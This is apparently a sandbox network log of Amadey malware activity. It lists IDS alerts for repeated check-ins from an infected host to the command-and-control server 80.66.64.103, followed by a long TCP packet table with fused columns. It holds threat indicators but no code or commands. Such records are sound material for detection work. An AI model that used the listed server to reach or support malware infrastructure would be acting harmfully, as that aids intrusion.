                                                                              192.168.2.480.66.64.10349785802027700 06/02/22-01:53:59.351850TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349914802027700 06/02/22-01:55:11.848128TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349874802027700 06/02/22-01:54:56.482566TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349866802027700 06/02/22-01:54:52.699550TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349819802027700 06/02/22-01:54:20.991169TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349903802027700 06/02/22-01:55:07.519813TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349880802027700 06/02/22-01:54:58.245914TCP2027700ET TROJAN Amadey CnC Check-In4988080192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349891802027700 06/02/22-01:55:01.891788TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349849802027700 06/02/22-01:54:41.432432TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349796802027700 06/02/22-01:54:04.522416TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349814802027700 06/02/22-01:54:17.528472TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349885802027700 06/02/22-01:54:59.420913TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349855802027700 06/02/22-01:54:48.113243TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349808802027700 06/02/22-01:54:14.080650TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.480.66.64.103
                                                                              192.168.2.480.66.64.10349850802027700 06/02/22-01:54:42.196474TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.480.66.64.103
Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                                              Jun 2, 2022 01:53:22.408226967 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408466101 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408545017 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408592939 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408674955 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408693075 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408763885 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408795118 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408876896 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408885956 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408907890 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.408960104 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.408981085 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409054041 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409068108 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409128904 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409282923 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409357071 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409383059 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409457922 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409471989 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409491062 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409535885 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409586906 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409655094 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409667015 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409687996 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409740925 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409751892 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409780979 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409787893 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409861088 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409873962 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409902096 CEST44349759172.67.152.230192.168.2.4
                                                                              Jun 2, 2022 01:53:22.409945965 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.409980059 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:22.414604902 CEST49759443192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:40.235853910 CEST4975880192.168.2.4172.67.152.230
                                                                              Jun 2, 2022 01:53:40.587559938 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.682431936 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:40.682535887 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.683010101 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.819966078 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:40.865782022 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:40.865875959 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.866113901 CEST4976480192.168.2.480.66.64.103
                                                                              Jun 2, 2022 01:53:40.961503983 CEST804976480.66.64.103192.168.2.4
                                                                              Jun 2, 2022 01:53:41.028842926 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.045341969 CEST8049765140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.046226978 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.050184965 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.067187071 CEST8049765140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.067491055 CEST4976580192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.074817896 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.074856997 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.075050116 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.105389118 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.105418921 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.158729076 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.158890963 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.749869108 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.749927044 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.750588894 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.753603935 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.753628016 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.772119999 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772260904 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.772284031 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772310019 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772536993 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.772624016 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.777277946 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.777312040 CEST44349766140.82.121.3192.168.2.4
                                                                              Jun 2, 2022 01:53:41.777328968 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:41.777954102 CEST49766443192.168.2.4140.82.121.3
                                                                              Jun 2, 2022 01:53:42.160839081 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.160898924 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.161051989 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.161731005 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.161760092 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.208158016 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.208303928 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.223193884 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.223227978 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.223520994 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.223625898 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.224648952 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.268506050 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357242107 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357419014 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357466936 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357548952 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357569933 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357701063 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357778072 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357794046 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357820034 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357903957 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357909918 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.357924938 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.357980013 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358000040 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358011961 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358084917 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358095884 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358114004 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358165026 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358201027 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358325005 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358450890 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358520985 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358561039 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358582973 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.358596087 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.358637094 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.359105110 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.359215975 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.359302998 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.359318972 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.359499931 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.359796047 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360611916 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360683918 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360745907 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360747099 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.360771894 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.360791922 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.360822916 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.361314058 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.361439943 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.361532927 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.361551046 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362159967 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362231016 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362257004 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.362283945 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.362301111 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.362910986 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372047901 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372283936 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372359991 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372437954 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372461081 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372509003 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372530937 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372711897 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372787952 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372797012 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372814894 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.372878075 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.372890949 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373440981 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373514891 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373527050 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.373543024 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.373614073 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.373626947 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374300003 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374377012 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374386072 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.374401093 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374475956 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.374489069 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.374773026 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.374789000 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.375313997 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.375438929 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.375468016 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.376061916 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377082109 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377101898 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377175093 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377204895 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377235889 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377254009 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377263069 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.377274990 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.377338886 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.378892899 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.378932953 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.379066944 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.379095078 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.379112959 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.379219055 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.389147043 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.389199018 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.389328957 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.389360905 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.389380932 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.389568090 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.431473017 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.431703091 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432166100 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432194948 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432265997 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432295084 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432311058 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432357073 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432405949 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432414055 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432544947 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432585001 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432646990 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432666063 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432713032 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432724953 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432862043 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.432889938 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.432924986 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433005095 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433018923 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433072090 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433082104 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433116913 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433155060 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433231115 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433244944 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433273077 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433300018 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433367014 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433407068 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433463097 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433479071 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433504105 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433537960 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433543921 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433558941 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433600903 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433650017 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433687925 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433717012 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433729887 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433753014 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433839083 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433897018 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.433897972 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433909893 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433955908 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.433988094 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434010029 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434039116 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434072018 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434073925 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434098005 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434133053 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434182882 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434201002 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434247971 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434269905 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434322119 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434360027 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434415102 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434439898 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434479952 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434505939 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434546947 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434572935 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434664965 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434684038 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434699059 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434757948 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.434923887 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.434976101 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435013056 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435028076 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435107946 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435116053 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435120106 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435142040 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435194969 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435249090 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435262918 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435288906 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435313940 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435323954 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435338020 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435384035 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435406923 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435420036 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435445070 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435461044 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435461998 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435507059 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435533047 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435547113 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435574055 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435592890 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435611010 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435619116 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435642958 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435745955 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435796976 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435832977 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435847998 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.435868025 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435889959 CEST49767443192.168.2.4185.199.108.133
                                                                              Jun 2, 2022 01:53:42.435987949 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.436037064 CEST44349767185.199.108.133192.168.2.4
                                                                              Jun 2, 2022 01:53:42.436083078 CEST49767443192.168.2.4185.199.108.133
